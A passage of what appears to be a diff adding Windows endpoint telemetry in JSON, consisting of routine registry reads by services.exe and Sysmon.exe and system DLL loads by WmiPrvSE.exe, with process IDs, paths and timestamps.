"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "dsparse.dll", + "image_path": "C:\\Windows\\System32\\dsparse.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "tscfgwmi.dll", + "image_path": "C:\\Windows\\System32\\tscfgwmi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 